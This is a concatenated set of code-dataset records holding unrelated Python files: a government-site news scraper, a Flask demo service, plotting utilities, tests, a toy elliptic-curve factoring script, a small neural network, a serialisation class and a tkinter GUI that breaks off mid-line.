print(r)","sub_path":"lc_455_assign_cookies.py","file_name":"lc_455_assign_cookies.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"36605876","text":"# coding: utf-8\n# Team : None\n# Author:zl\n# Date :2020/6/30 0030 12:08 PM\n# Tool :PyCharm\n\n\nimport requests\nimport re\nimport os\nimport csv\nimport random\nimport time\n\nheaders={\n'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',\n'Accept-Encoding':'gzip, deflate',\n'Accept-Language':'zh-CN,zh;q=0.9',\n'Connection':'keep-alive',\n# 'Host':'www.hbjc.gov.cn',\n'Referer':'http://www.hbjc.gov.cn/',\n'Upgrade-Insecure-Requests':'1',\n'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36',\n}\n\ntable_names=['title','content','riqi','desc','url']\n\nprint('111')\n\ndef qu_html_lable(s):\n reg = re.compile(r'<[^>]+>', re.S)\n if isinstance(s, str):\n return reg.sub('', s)\n else:\n print('Hey, give me a string')\n return 0\n\ndef parse_index(link,desc):\n response=requests.get(link,headers=headers)\n\n text=response.text\n\n result=re.findall('''''',text,re.S)[0]\n\n result=re.findall('''
  • (.*?)\\[(.*?)\\]
  • ''',result,re.S)\n\n for url,title,riqi in result:\n if url in log:\n print('Already downloaded, skipping')\n continue\n\n print(url)\n item = {}\n item['desc']=desc\n if '../.' in url:\n item['url']=url.replace('../../','http://www.hbjc.gov.cn/')\n else:\n item['url']=url.replace('./',desc)\n item['title']=title\n item['riqi']=riqi\n item['content']=get_content(item['url'])\n\n print(item)\n time.sleep(random.randint(1,3))\n write_csv(item)\n\n with open('./log.txt', 'a', encoding='utf-8') as f:\n f.write(url+'\\r\\n')\n\ndef get_content(page_url):\n\n print(page_url)\n response=requests.get(page_url,headers=headers)\n if 'www.spp.gov.cn/' in page_url:\n text=response.content.decode('utf-8')\n\n result=re.findall('

    (.*?)

    ',text,re.S)\n\n result = '.'.join(result)\n result=qu_html_lable(result)\n return(result)\n\n else:\n text=response.text\n result = re.findall(''' (.*?)''', text, re.S)[0]\n result = qu_html_lable(result)\n result = result.replace(' ', '').replace('\\u3000', '').replace('\\n', '').replace(' ','')\n return (result)\n\n\n\n\ndef write_csv(item):\n filename=item['desc'].split('/')[-2]\n if os.path.exists('./{}.txt'.format(filename)):\n with open('./{}.txt'.format(filename), 'a', newline='', encoding='utf-8-sig') as f:\n\n writer = csv.DictWriter(f, table_names)\n writer.writerow(item)\n f.flush()\n else:\n with open('./{}.txt'.format(filename), 'w', newline='', encoding='utf-8-sig') as f:\n # The header is passed in here, written as the first row of data\n writer = csv.DictWriter(f, table_names)\n writer.writeheader()\n writer.writerow(item)\n f.flush()\n\n\n\n\n\n\najxx=['http://www.hbjc.gov.cn/qwfb/ajxx/'] #Case information index pages under the "authoritative releases" section, 18 pages in total\nfor i in range(1,18):\n ajxx.append('http://www.hbjc.gov.cn/qwfb/ajxx/index_{}.shtml'.format(i))\n\nzdal=['http://www.hbjc.gov.cn/qwfb/zdal/',\n 'http://www.hbjc.gov.cn/qwfb/zdal/index_1.shtml'\n ] #Guiding case index pages under the "authoritative releases" section, 2 pages in total\n\nndbg=['http://www.hbjc.gov.cn/gzbg/ndbg/',\n 'http://www.hbjc.gov.cn/gzbg/ndbg/index_1.shtml'\n ] #Annual report index pages under the "work reports" section, two pages in total\n\nbnbg=['http://www.hbjc.gov.cn/gzbg/bnbg/'] #Semi-annual report index page under the "work reports" section, one page\nztbg=['http://www.hbjc.gov.cn/gzbg/ztbg/']#Special report index page under the "work reports" section, one page\n\n\nprint(ajxx)\nprint(zdal)\nprint(ndbg)\nprint(bnbg)\nprint(ztbg)\n\nlog=''\n\nif os.path.exists('./log.txt'):\n with open('./log.txt','r',encoding='utf-8') as f:\n log=f.read()\nelse:\n with open('./log.txt', 'w', encoding='utf-8') as f:\n f.write('')\n log=''\n\nfor i in bnbg:\n print('Downloading semi-annual report ' + i)\n parse_index(i, desc='http://www.hbjc.gov.cn/gzbg/bnbg/')\n\nfor i in ztbg:\n print('Downloading work report ' + i)\n parse_index(i, desc='http://www.hbjc.gov.cn/gzbg/ztbg/')\n\n\n\nfor i in zdal:\n print('Downloading guiding case ' + i)\n parse_index(i,desc='http://www.hbjc.gov.cn/qwfb/zdal/')\n\n\n\nfor i in ndbg:\n print('Downloading annual report ' + i)\n parse_index(i, desc='http://www.hbjc.gov.cn/gzbg/ndbg/')\n\n\n\nfor i in ajxx:\n print('Downloading case information '+i)\n parse_index(i,desc='http://www.hbjc.gov.cn/qwfb/ajxx/')\n\n","sub_path":"湖北检察院.py","file_name":"湖北检察院.py","file_ext":"py","file_size_in_byte":4728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"14507984","text":"#!/usr/bin/python\n\nimport os, math\nfrom flask import Flask, request, Response\nimport requests\nimport json\n\napp = Flask(__name__)\n\nPORT = 6000\n\n@app.route(\"/\")\ndef main():\n return \"Helloworld istio demo\"\n\n@app.route(\"/topstories\")\ndef topStories():\n url = 'https://hacker-news.firebaseio.com/v0/topstories.json?print=pretty'\n header = {\n \"User-Agent\": \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36\"\n }\n resp_data = requests.get(url, headers = header)\n if resp_data.ok:\n resp_json = resp_data.json()\n else:\n resp_json = { \"blocked\": \"true\" }\n\n resp_data = json.dumps(resp_json)\n return Response(resp_data , 200, content_type=\"application/json\")\n\n@app.route('/hello')\ndef hello():\n version = os.environ.get('SERVICE_VERSION')\n\n # do some cpu intensive computation\n x = 0.0001\n for i in range(0, 1000000):\n\t x = x + math.sqrt(x)\n\n return 'Hello version: %s, instance: %s\\n' % (version, os.environ.get('HOSTNAME'))\n\n@app.route('/health')\ndef health():\n return 'Helloworld is healthy', 200\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0', 
port=PORT)\n","sub_path":"workshop03/warmup_exercise/istio/app-with-external-apicall/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"167982515","text":"# standart modules\nimport os\n\n# torch\nimport torch\nimport torchvision\nfrom torch import nn\n\nimport numpy as np\nimport matplotlib\nimport matplotlib.pyplot as plt\n\n# my libraries\nfrom not_functional.models.utils.BasicUtils import torch_image_to_numpy_image, rgb2gray\nfrom not_functional.models.utils.BasicUtils import data_getters\n\nmatplotlib.use('agg')\n\nclass matplotlib_visualization:\n def plot_loss(self, D_cost_train, D_wass_train, D_cost_valid, D_wass_valid,\n G_cost, save_path) -> None:\n \"\"\"\n Visualize Discriminators and Generator with respect to cost and Wasserstein(metric) loss using Matplotlib\n :param D_cost_train: Discriminators train cost\n :param D_wass_train: Discriminators train Wasserstein cost\n :param D_cost_valid: Discriminators validation cost\n :param D_wass_valid: Discriminators validation Wasserstein cost\n :param G_cost: Generator cost\n :param save_path: Image path. Save plot as image.\n :return: None\n \"\"\"\n assert len(D_cost_train) == len(D_wass_train) == len(D_cost_valid) == len(D_wass_valid) == len(G_cost)\n\n save_path = os.path.join(save_path, \"loss_curve.png\")\n\n x = range(len(D_cost_train))\n\n y1 = D_cost_train\n y2 = D_wass_train\n y3 = D_cost_valid\n y4 = D_wass_valid\n y5 = G_cost\n\n plt.plot(x, y1, label='D_loss_train')\n plt.plot(x, y2, label='D_wass_train')\n plt.plot(x, y3, label='D_loss_valid')\n plt.plot(x, y4, label='D_wass_valid')\n plt.plot(x, y5, label='G_loss')\n\n plt.xlabel('Epoch')\n plt.ylabel('Loss')\n\n plt.legend(loc=4)\n plt.grid(True)\n plt.tight_layout()\n\n plt.savefig(save_path)\n\n def plot_conv2d_weights(self, net):\n for i, module in enumerate(net.modules()):\n if isinstance(module, nn.Conv1d) or isinstance(module, nn.Conv2d):\n module_name = \"Conv\" + str(i)\n weights = module.weight\n weights = weights.reshape(-1).detach().cpu().numpy()\n print(\"{} bias: \".format(module_name), module.bias) # Bias to zero\n plt.hist(weights)\n plt.title(module_name)\n plt.show()\n\n ## inspect the data, parameters and NN(Neural Network)\n def imshow(self, img):\n img_shape = img.shape\n print(\"img_shape: {}\".format(img.shape))\n img = img / 2 + 0.5 # unnormalize\n trans_img = torch_image_to_numpy_image(img)\n print(\"img_shape: {}\".format(img.shape))\n plt.imshow(trans_img) # numpy and torch dimension orders are different so that need to change dims.\n # torch dim order: CHW(channel, height, width)\n plt.show()\n # print(\"image size: {}\".format( np.transpose(npimg, (1, 2, 0)).size ) )\n\n def inspect_data(self, loader: torch.utils.data.dataloader.DataLoader):\n # get some random training images\n loader_type = loader.dataset.train\n if loader_type:\n images, labels = data_getters.get_one_iter(self.trainloader)\n else:\n images, labels = data_getters.get_one_iter(self.testloader)\n # show images\n self.imshow(torchvision.utils.make_grid(images))\n # print labels\n print('classes: ', ''.join('%5s' % self.classes[labels[j]] for j in range(self.batch_size)))\n\n def inspect_one_data(self, images):\n image = images[0, ...]\n img = np.squeeze(image)\n img = torch_image_to_numpy_image(img) # PIL or numpy image format\n img = rgb2gray(img) # gray scale\n\n fig = plt.figure(figsize=(12, 12))\n ax = fig.add_subplot(111)\n ax.imshow(img, 
cmap='gray')\n width, height = img.shape\n thresh = img.max() / 2.5\n for x in range(width):\n for y in range(height):\n val = round(img[x][y], 2) if img[x][y] != 0 else 0\n ax.annotate(str(val), xy=(y, x),\n horizontalalignment='center',\n verticalalignment='center',\n color='white' if img[x][y] < thresh else 'black')\n plt.show()\n","sub_path":"not_functional/models/utils/visualization/matplotlib_visualization.py","file_name":"matplotlib_visualization.py","file_ext":"py","file_size_in_byte":4176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"54521541","text":"# Copyright (c) 2014, Dignity Health\n#\n# Author: Ashley Anderson III \n# Date: 2016-01-25 09:50\n\nimport gpi\nimport numpy as np\nimport bart.python.cfl as cfl\nimport os\n\nclass ExternalNode(gpi.NodeAPI):\n \"\"\"Uses the numpy save interface for writing arrays.\n\n INPUT - numpy array to write\n\n WIDGETS:\n File Browser - button to launch file browser, and typein widget, to give pathname for output file\n Write Mode - write at any event, or write only with new filename\n Write Now - write right now\n \"\"\"\n\n def initUI(self):\n\n # Widgets\n self.addWidget(\n 'SaveFileBrowser', 'File Browser', button_title='Browse',\n caption='Save File (*.npy)', filter='cfl (*.cfl)')\n self.addWidget('PushButton', 'Write Mode', button_title='Write on New Filename', toggle=True)\n self.addWidget('PushButton', 'Write Now', button_title='Write Right Now', toggle=False)\n\n # IO Ports\n self.addInPort('in', 'NPYarray', dtype=np.complex64)\n\n # store for later use\n self.URI = gpi.TranslateFileURI\n\n def validate(self):\n\n if self.getVal('Write Mode'):\n self.setAttr('Write Mode', button_title=\"Write on Every Event\")\n else:\n self.setAttr('Write Mode', button_title=\"Write on New Filename\")\n\n fname = self.URI(self.getVal('File Browser'))\n self.setDetailLabel(fname)\n\n return 0\n\n def compute(self):\n\n if self.getVal('Write Mode') or self.getVal('Write Now') or ('File Browser' in self.widgetEvents()):\n\n fpath = self.URI(self.getVal('File Browser'))\n basedir, fname = os.path.split(fpath)\n basename, ext = os.path.splitext(fname)\n\n outpath = os.path.join(basedir, basename)\n\n data = self.getData('in')\n cfl.writecfl(outpath, data)\n\n return(0)\n","sub_path":"gpi/WriteCFL_GPI.py","file_name":"WriteCFL_GPI.py","file_ext":"py","file_size_in_byte":1872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"459295161","text":"import pandas as pd\nimport time\nimport os.path\n#All of the files should be located in C:\\Users\\FIY716\\Documents\\Projects\\New_Column but below are the full paths for ease of use\n#C:\\Users\\FIY716\\Documents\\Projects\\New_Column\\Prod_Debt.xlsx\n#C:\\Users\\FIY716\\Documents\\Projects\\New_Column\\QA_Debt.xlsx\n#C:\\Users\\FIY716\\Documents\\Projects\\New_Column\\Prod_IP.xlsx\n#C:\\Users\\FIY716\\Documents\\Projects\\New_Column\\QA_IP.xlsx\nPROD_debt_file = input(\"Please enter the file path of the Prod Debt file you are looking to compare:\")\nQA_debt_file = input(\"Please enter the file path of the QA Debt file you are looking to compare:\")\nPROD_IP_file = input(\"Please enter the file path of the Prod IP file you are looking to compare:\")\nQA_IP_file = input(\"Please enter the file path of the QA IP file you are looking to compare:\")\n\nif os.path.isfile(PROD_debt_file) and os.path.isfile(QA_debt_file) and os.path.isfile(PROD_IP_file) and os.path.isfile(QA_IP_file):\n print(\"Thank you, 
please allow a few minutes for the process to complete :)\")\n\n start = time.time()\n\n df1 = pd.read_excel(PROD_debt_file, index_col=0)\n df2 = pd.read_excel(QA_debt_file, index_col=0)\n df3 = pd.read_excel(PROD_IP_file, index_col=0)\n df4 = pd.read_excel(QA_IP_file, index_col=0)\n\n#The indicator parameter below adds a new column to the merged data set notifying you of which data set the info is coming from\n df_new_ip = df3.merge(df4, on = 'TRD_ID', how='outer', indicator=True)\n df_new_debt = df1.merge(df2, on = 'TRD_ID', how='outer', indicator=True)\n#The new column is called \"_merge\"\n df_common_ip = df_new_ip[df_new_ip['_merge'] == 'both']\n df_common_debt = df_new_debt[df_new_debt['_merge'] == 'both']\n#The lines below create variables from prod and qa without the common rows between them\n df_prod_debt = df1[(~df1.TRD_ID.isin(df_common_debt.TRD_ID))]\n df_qa_debt = df2[(~df2.TRD_ID.isin(df_common_debt.TRD_ID))]\n df_prod_ip = df3[(~df3.TRD_ID.isin(df_common_ip.TRD_ID))]\n df_qa_ip = df4[(~df4.TRD_ID.isin(df_common_ip.TRD_ID))]\n#Build dataframes of the diffs between the two files\n prod_debt = pd.DataFrame(df_prod_debt)\n qa_debt = pd.DataFrame(df_qa_debt)\n prod_ip = pd.DataFrame(df_prod_ip)\n qa_ip = pd.DataFrame(df_qa_ip)\n#Converting df to csv\n debt_prod_csv = prod_debt.to_csv(r\"C:/Users/FIY716/Documents/Projects/New_Column/Unique_Prod_Debt.csv\", index = None, header=True)\n debt_qa_csv = qa_debt.to_csv(r\"C:/Users/FIY716/Documents/Projects/New_Column/Unique_QA_Debt.csv\", index = None, header=True)\n ip_prod_csv = prod_ip.to_csv(r\"C:/Users/FIY716/Documents/Projects/New_Column/Unique_PROD_IP.csv\", index = None, header=True)\n ip_qa_csv = qa_ip.to_csv(r\"C:/Users/FIY716/Documents/Projects/New_Column/Unique_QA_IP.csv\", index = None, header=True)\n\n print(\"...............................\")\n print('It took', round(time.time()-start,2), 'seconds for this script to run, thank you for your patience.')\nelse:\n print(\"You have entered an invalid file path, please try again.\")\n\n","sub_path":"File_Compare.py","file_name":"File_Compare.py","file_ext":"py","file_size_in_byte":3038,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"161120019","text":"\"\"\"\nCopyright 2021 AI Singapore\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n https://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\"\"\"\n\n\nimport numpy as np\n\nimport pytest\nfrom peekingduck.pipeline.nodes.input.recorded import Node\n\n\ndef create_reader():\n media_reader = Node({\"input\": \"source\",\n \"output\": \"img\",\n \"resize\": {\n \"do_resizing\": False,\n \"width\": 1280,\n \"height\": 720},\n \"mirror_image\": False,\n \"input_dir\": \".\"\n })\n return media_reader\n\n\ndef _get_video_file(reader, num_frames):\n \"\"\"Helper function to get an entire videofile\"\"\"\n video = []\n for _ in range(num_frames):\n output = reader.run({})\n video.append(output[\"img\"])\n return video\n\n\n@pytest.mark.usefixtures(\"tmp_dir\")\nclass TestMediaReader:\n\n def 
test_reader_run_throws_error_on_wrong_file_path(self):\n with pytest.raises(FileNotFoundError):\n file_path = 'path_that_does_not_exist'\n Node({\"input\": \"source\",\n \"output\": \"img\",\n \"resize\": {\n \"do_resizing\": False,\n \"width\": 1280,\n \"height\": 720},\n \"mirror_image\": False,\n \"input_dir\": file_path\n })\n\n def test_reader_run_throws_error_on_empty_folder(self):\n with pytest.raises(FileNotFoundError):\n reader = create_reader()\n reader.run({})\n\n def test_reader_reads_one_image(self, create_input_image):\n image1 = create_input_image(\"image1.png\", (900, 800, 3))\n reader = create_reader()\n output1 = reader.run({})\n assert np.array_equal(output1['img'], image1)\n\n def test_reader_reads_multi_images(self, create_input_image):\n image1 = create_input_image(\"image1.png\", (900, 800, 3))\n image2 = create_input_image(\"image2.png\", (900, 800, 3))\n image3 = create_input_image(\"image3.png\", (900, 800, 3))\n reader = create_reader()\n output1 = reader.run({})\n output2 = reader.run({})\n output3 = reader.run({})\n\n assert np.array_equal(output1['img'], image1)\n assert np.array_equal(output2['img'], image2)\n assert np.array_equal(output3['img'], image3)\n\n def test_reader_reads_one_video(self, create_input_video):\n num_frames = 30\n size = (600, 800, 3)\n video1 = create_input_video(\n \"video1.avi\", fps=10, size=size, nframes=num_frames\n )\n reader = create_reader()\n\n read_video1 = _get_video_file(reader, num_frames)\n assert np.array_equal(read_video1, video1)\n\n def test_reader_reads_multiple_videos(self, create_input_video):\n num_frames = 20\n size = (600, 800, 3)\n\n video1 = create_input_video(\n \"video1.avi\", fps=5, size=size, nframes=num_frames\n )\n video2 = create_input_video(\n \"video2.avi\", fps=5, size=size, nframes=num_frames\n )\n\n reader = create_reader()\n\n read_video1 = _get_video_file(reader, num_frames)\n assert np.array_equal(read_video1, video1)\n\n read_video2 = _get_video_file(reader, num_frames)\n assert np.array_equal(read_video2, video2)\n","sub_path":"tests/pipeline/nodes/input/test_recorded.py","file_name":"test_recorded.py","file_ext":"py","file_size_in_byte":3805,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"555370107","text":"def gcd(a,b):\n if b==0:\n return a\n else:\n return gcd(b,a%b)\n\ndef modInverse(a, m) :\n a = a % m;\n for x in range(1, m) :\n if (a * x) % m == 1:\n return x\n return 1\n\ndef find_lambda_of_one_point(x, y, a, n):\n top = 3 * x * x + a\n bot = 2 * y\n inv_bot = modInverse(bot, n)\n if inv_bot == 1:\n print(\"ANSWER: \", bot, gcd(bot, n))\n return (top * inv_bot) % n\n\ndef find_lambda_of_two_points(x1, y1, x2, y2, n):\n top = (y2 - y1)\n bot = (x2 - x1)\n inv_bot = modInverse(bot, n)\n if inv_bot == 1:\n print(\"ANSWER: \", bot, gcd(bot, n))\n return (top * inv_bot) % n\n\ndef find_x3_y3(lam, x1, x2, y1, n):\n x3 = (lam * lam - x1 - x2) % n\n y3 = (lam * (x1 - x3) - y1) % n\n return x3, y3\n\n\ndef fuck_471(x, y, a, n, iter):\n # y^2 = x^3 + Ax + B\n lam = find_lambda_of_one_point(x, y, a, n)\n new_x = find_x3_y3(lam, x, x, y, n)[0]\n new_y = find_x3_y3(lam, x, x, y, n)[1]\n\n #print(x, y, new_x, new_y)\n for i in range(2, iter):\n lam = find_lambda_of_two_points(x, y, new_x, new_y, n)\n new_y = find_x3_y3(lam, x, new_x, y, n)[1]\n new_x = find_x3_y3(lam, x, new_x, y, n)[0]\n\n print(new_x, new_y)\n\n\nif __name__ == '__main__':\n n = 73\n a = 8\n k = 11\n x = 32\n y = 53\n fuck_471(x, y, a, n, 
k)\n\n","sub_path":"tester/lenstra.py","file_name":"lenstra.py","file_ext":"py","file_size_in_byte":1322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"486965080","text":"import numpy as np\n\n# Helper functions\ndef tanh(x):\n return np.tanh(x)\ndef tanh_deriv(x):\n return 1.0 - pow(tanh(x), 2)\ndef logistic(x):\n return 1/(1 + np.exp(-x))\ndef logistic_deriv(x):\n return logistic(x)*(1-logistic(x))\n\n# Main neural network class\nclass NeuralNetwork:\n def __init__(self, layers, activation='tanh'):\n \"\"\"\n :param layers: a list with the number of units in each layer; must contain at least two values\n :param activation: a str naming the activation function to use; either 'logistic' or 'tanh'\n \"\"\"\n # Choose the activation function\n if activation == 'logistic':\n self.activation = logistic\n self.activation_deriv = logistic_deriv\n elif activation == 'tanh': \n self.activation = tanh\n self.activation_deriv = tanh_deriv\n # Initialize the weight containers in [-0.25, 0.25]. (? this handling is questionable)\n self.weights = []\n for i in range(1, len(layers) - 1): # every layer except the output layer\n self.weights.append((2*np.random.random((layers[i - 1] + 1, layers[i] + 1)) - 1)*0.25) # layers[i-1] rows, layers[i] columns\n# self.weights.append((2*np.random.random((layers[i] + 1, layers[i + 1] + 1)) - 1)*0.25)\n self.weights.append((2*np.random.random((layers[len(layers) - 2] + 1, layers[len(layers) - 1])) - 1)*0.25)\n# print(self.weights, len(self.weights))\n def fit(self, X, y, learning_rate = 0.2, epochs = 10000): # X: rows are instances, columns are features\n \"\"\"\n :param learning_rate: coefficient used when back-propagating corrections to the weights and bias\n :param epochs: number of training iterations; one sample is drawn from X per iteration, and training stops after this many loops\n \"\"\"\n X = np.atleast_2d(X) # coerce X to a 2-D numpy array\n temp = np.ones([X.shape[0], X.shape[1] + 1]) # all-ones matrix; the extra column holds the bias\n temp[:, 0:-1] = X # add the bias to the input layer\n X = temp\n y = np.array(y) # convert y to a numpy array\n# print(X, '\\n', y)\n # Train the network\n for k in range(epochs): # epochs loops in total, each drawing one random sample\n i = np.random.randint(X.shape[0]) # pick a random row\n a = [X[i]]\n for l in range(len(self.weights)): # a[l] computes the next layer's nodes from the previous layer; the bias is folded into the weights here, which becomes clear on close reading\n# print(l, a[l])\n a.append(self.activation(np.dot(a[l], self.weights[l])))\n error = y[i] - a[-1]\n deltas = [error * self.activation_deriv(a[-1])] # error term\n # Back-propagate to update the weights and bias\n for l in range(len(a) - 2, 0, -1):\n deltas.append(deltas[-1].dot(self.weights[l].T)*self.activation_deriv(a[l]))\n deltas.reverse()\n for i in range(len(self.weights)):\n layer = np.atleast_2d(a[i])\n delta = np.atleast_2d(deltas[i])\n self.weights[i] += learning_rate * layer.T.dot(delta)\n def predict(self, x):\n \"\"\"\n :param x: the sample to test\n \"\"\"\n x = np.array(x)\n temp = np.ones(x.shape[0] + 1)\n temp[0:-1] = x\n a = temp\n for l in range(0, len(self.weights)):\n a = self.activation(np.dot(a, self.weights[l]))\n return a","sub_path":"HandwriteNum_OpenDataSet_NeuralNetwork/implement/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"182741254","text":"#!/usr/bin/python3\n\"\"\"Base Class\"\"\"\nimport json\n\n\nclass Base:\n \"\"\"Base Class\"\"\"\n\n __nb_objects = 0\n\n def __init__(self, id=None):\n \"\"\"Args:\n id\n \"\"\"\n\n if id is not None:\n self.id = id\n else:\n Base.__nb_objects += 1\n self.id = Base.__nb_objects\n\n @staticmethod\n def to_json_string(list_dictionaries):\n \"\"\"Json to a string\"\"\"\n\n if list_dictionaries is None:\n return \"[]\"\n else:\n return(json.dumps(list_dictionaries))\n\n @classmethod\n def save_to_file(cls, list_objs):\n \"\"\"JSON write and save object to a file\"\"\"\n\n filename = cls.__name__ + '.json'\n data = []\n if list_objs is None:\n data = 
None\n else:\n for i in range(len(list_objs)):\n data.append(cls.to_dictionary(list_objs[i]))\n with open(filename, \"w\", encoding='utf-8') as f:\n f.write(cls.to_json_string(data))\n\n @staticmethod\n def from_json_string(json_string):\n \"\"\"Return JSON represenation\"\"\"\n nothing = []\n if json_string is None or len(json_string) == len(nothing):\n return []\n else:\n return(json.loads(json_string))\n\n @classmethod\n def create(cls, **dictionary):\n \"\"\"dummy class\"\"\"\n if cls.__name__ == 'Rectangle':\n dummy_class = cls(1, 1)\n dummy_class.update(**dictionary)\n else:\n if cls.__name__ == 'Square':\n dummy_class = cls(1)\n dummy_class.update(**dictionary)\n return dummy_class\n\n @classmethod\n def load_from_file(cls):\n new_list = []\n filename = cls.__name__ + \".json\"\n try:\n with open(filename, \"r\") as f:\n new_list = cls.from_json_string(f.read())\n for i, j in enumerate(new_list):\n new_list[i] = cls.create(**new_list[i])\n except:\n pass\n return new_list\n","sub_path":"0x0C-python-almost_a_circle/models/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":2010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"609176364","text":"from tkinter import *\nfrom tkinter import ttk\nimport Match as Ma\nimport Team as Te\nimport Player as Pl\n\nprint(\"hi, this is Marissa :)\")\n\nclass GUI:\n\n def __init__(self, master): #-- magic funtion that builds GUI\n self.master = master\n master.title(\"Matchmaking GUI\")\n\n # -------------------------------------------------- FRAMES -------------------------------------------------\n self.button_frame = Frame(master) # - Frame BOTTOM\n self.button_frame.pack(side=BOTTOM, fill=X, padx=15)\n\n self.col0_frame = Frame(master) # - Frame 0\n self.col0_frame.pack(side=LEFT)\n\n self.playerq_frame = Frame(master) # - Frame 1\n self.playerq_frame.pack(side=LEFT)\n self.playerq_frame['borderwidth'] = 3\n self.playerq_frame['relief'] = 'sunken'\n\n self.col2_frame = Frame(master) # - Frame 2\n self.col2_frame.pack(side=LEFT)\n\n self.matchmaking_pr_frame = Frame(master) # - Frame 3\n self.matchmaking_pr_frame.pack(side=LEFT)\n self.matchmaking_pr_frame['borderwidth'] = 3\n self.matchmaking_pr_frame['relief'] = 'sunken'\n\n self.col4_frame = Frame(master) # - Frame 4\n self.col4_frame.pack(side=LEFT)\n\n self.finishmatch_frame = Frame(master) # - Frame 5\n self.finishmatch_frame.pack(side=LEFT)\n self.finishmatch_frame['borderwidth'] = 3\n self.finishmatch_frame['relief'] = 'sunken'\n\n self.col6_frame = Frame(master) # - Frame 6\n self.col6_frame.pack(side=LEFT)\n\n # -------------------------------------------------- FRAME 0 --------------------------------------------------\n self.spacing_col0 = Label(self.col0_frame, text=\" \") # - 3 spaces\n self.spacing_col0.config(height=2)\n self.spacing_col0.grid(row=0, column=0, sticky=W) # -- for spacing purposes\n # -------------------------------------------------- FRAME 1 --------------------------------------------------\n self.playerq_title = Label(self.playerq_frame, text=\"Player Queue\")\n self.playerq_title.grid(row=1, column=1, sticky=W)\n\n self.spacing_col1 = Label(self.playerq_frame, text=\"\\t\")\n self.spacing_col1.grid(row=2, column=1, sticky=W) # -- for spacing purposes\n\n self.playerq_box = Text(self.playerq_frame)\n self.playerq_box.config(height=36, width=25) # - this should have 'state=\"disabled\"'\n self.playerq_box.grid(row=3, column=1, sticky=W)\n # -------------------------------------------------- 
FRAME 2 --------------------------------------------------\n self.spacing_col2 = Label(self.col2_frame, text=\" \") # - 2 spaces\n self.spacing_col2.grid(row=0, column=2, sticky=W) # -- for spacing purposes\n # -------------------------------------------------- FRAME 3 --------------------------------------------------\n self.matchmaking_pr_title = Label(self.matchmaking_pr_frame, text=\"Matchmaking Process\")\n self.matchmaking_pr_title.grid(row=1, column=3, sticky=W)\n\n self.matches_option = ttk.Combobox(self.matchmaking_pr_frame, values=[\n \"Division1\",\n \"Division2\",\n \"Division3\",\n \"Division4\"])\n self.matches_option.grid(row=1, column=3, sticky=E)\n self.matches_option.current(0)\n\n self.spacing_col3 = Label(self.matchmaking_pr_frame, text=\"\\t\")\n self.spacing_col3.grid(row=2, column=3, sticky=W) # -- for spacing purposes\n\n self.matches_box = Text(self.matchmaking_pr_frame)\n self.matches_box.config(height=36, width=45, state=\"disabled\")\n self.matches_box.grid(row=3, column=3, sticky=N)\n # -------------------------------------------------- FRAME 4 --------------------------------------------------\n self.spacing_col4 = Label(self.col4_frame, text=\" \") # - 2 spaces\n self.spacing_col4.grid(row=0, column=4, sticky=W) # -- for spacing purposes\n # -------------------------------------------------- FRAME 5 --------------------------------------------------\n self.finishmatches_title = Label(self.finishmatch_frame, text=\"Finished Matches\")\n self.finishmatches_title.grid(row=1, column=5, sticky=W)\n\n self.finishmatches_option = ttk.Combobox(self.finishmatch_frame, values=[\n \"Division1\",\n \"Division2\",\n \"Division3\",\n \"Division4\"])\n self.finishmatches_option.grid(row=1, column=5, sticky=E)\n self.finishmatches_option.current(0)\n\n self.spacing_col5 = Label(self.finishmatch_frame, text=\"\\t\")\n self.spacing_col5.grid(row=2, column=5, sticky=W) # -- for spacing purposes\n\n self.finmatches_box = Text(self.finishmatch_frame)\n self.finmatches_box.config(height=36, width=45, state=\"disabled\")\n self.finmatches_box.grid(row=3, column=5, sticky=N)\n # -------------------------------------------------- FRAME 6 --------------------------------------------------\n self.spacing_col4 = Label(self.col6_frame, text=\" \") # - 2 spaces\n self.spacing_col4.grid(row=0, column=6, sticky=W) # -- for spacing purposes\n # -------------------------------------------------- FRAME BOTTOM --------------------------------------------------\n self.accept_p_button = Button(self.button_frame, text=\" ACCEPT PLAYERS \", command=self.accept_players())\n self.accept_p_button.grid(row=4, column=1, sticky=W)\n\n self.stop_p_button = Button(self.button_frame, text=\" STOP \")\n self.stop_p_button.grid(row=4, column=3, sticky=E, padx=80)\n\n\n def accept_players(self):\n tPlayer = Pl.Player(username=\"BOB\", summonerID=120385)\n print(tPlayer.username)\n\n self.playerq_box.insert(END, tPlayer.username + \" - \" + str(tPlayer.summonerID) + \"\\n\")\n\n\n def test(self): # - ?\n print(\"hi\")\n\nroot = Tk()\ngui = 